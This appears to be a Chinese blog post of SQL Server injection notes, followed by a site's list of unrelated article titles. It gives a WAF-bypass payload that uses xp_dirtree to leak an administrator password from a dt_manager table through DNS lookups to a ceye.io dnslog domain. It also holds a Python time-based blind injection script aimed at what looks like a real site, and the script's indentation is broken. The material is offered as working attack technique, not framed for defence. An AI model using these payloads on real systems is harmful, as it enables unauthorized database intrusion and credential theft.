遇到中文的列名

利用unicode 进行单字节的转换

declare @s varchar(50);
set @s = N'拉';
select UniCode(@s),nchar(UniCode(@s));

绕狗sql 方法

利用dnslog 进行sql

  /xx.aspx?id='--/%2a%0a%3bDECLARE+%40host+varchar(1024)%3bSELECT+%40host%3dCONVERT(varchar(1024),(select+top+1+user_pwd+from+gt.dbo.dt_manager+where+id=1))%2b'.czj.pw2.lf0145.ceye.io'%3bEXEC('master..xp_dirtree+"\\'%2b%40host%2b'\foobar$"')%3b--%20a%2a/ 

中文回显

select nchar('21776')

URLdecode

/xx.aspx?id=1'--/* 2 ;DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 user_pwd from gt.dbo.dt_manager where id=1))+'.czj.pw2.lf0145.ceye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');-- a*/

基于时间盲注脚本

import requests
import time
sqlstr=''
for i in range(1,33):
for j in range(47,130): url="http://cxxzx.cn/xx.aspx?xx=1'--/*%0a%3bif+(ascii(substring((select+top+1+user_name+from+gt.dbo.dt_manager+where+id=1),{},1)))={}+WAITFOR+DELAY+'0%3a0%3a6'--%20a*/".format(i,j) print url
stime = time.time()
r=requests.post(url)
etime = time.time()
if etime-stime>5:
sqlstr=sqlstr+chr(j)
print sqlstr
break
if j == 129:
quit() print sqlstr

  

最新文章

  1. BAT及各大互联网公司2014前端笔试面试题--Html,Css篇
  2. jquery checkbox实例
  3. .Net在线付款---Paypal在线付款开发过程
  4. nodejs - 如何完全更新
  5. SQL中join的用法
  6. Spring两种实现AOP的方式
  7. Java中的字符串驻留(String Interning)
  8. 如何使用 HTTP 响应头字段来提高 Web 安全性?
  9. 使用sqlplus批量执行脚本的总结
  10. C指针陷阱
  11. JS中通过call方法实现继承
  12. 关于IOS的屏幕适配(iPhone)——Auto Layout和Size Classes
  13. 转: .Net 4.0 ExpandoObject 使用
  14. Python之Pandas的一些理解
  15. canvas画圆角矩形的方法
  16. linux下编译upx ucl
  17. Python学习(八) —— 内置函数和匿名函数
  18. MySql 死锁时的一种解决办法【转】
  19. Direct3d 设备丢失 (device lost) (转载)
  20. 在kali linux之下安装wps之后 报错字体缺失

热门文章

  1. 【python实现卷积神经网络】padding2D层实现
  2. search(5)- elastic4s-构建索引
  3. webWMS开发过程记录(二)- WMS是什么
  4. 前端笔记(关于css盒模型知识整理)
  5. 今天整理了几个在使用python进行数据分析的常用小技巧、命令。
  6. 把川普射上太阳—如何用python制作小游戏
  7. 深圳博客第一篇(Json)
  8. 菜鸡试飞----SRCの信息收集手册
  9. CVE-2018-12613 的一些思考
  10. 如何使用Jsoup爬取网页内容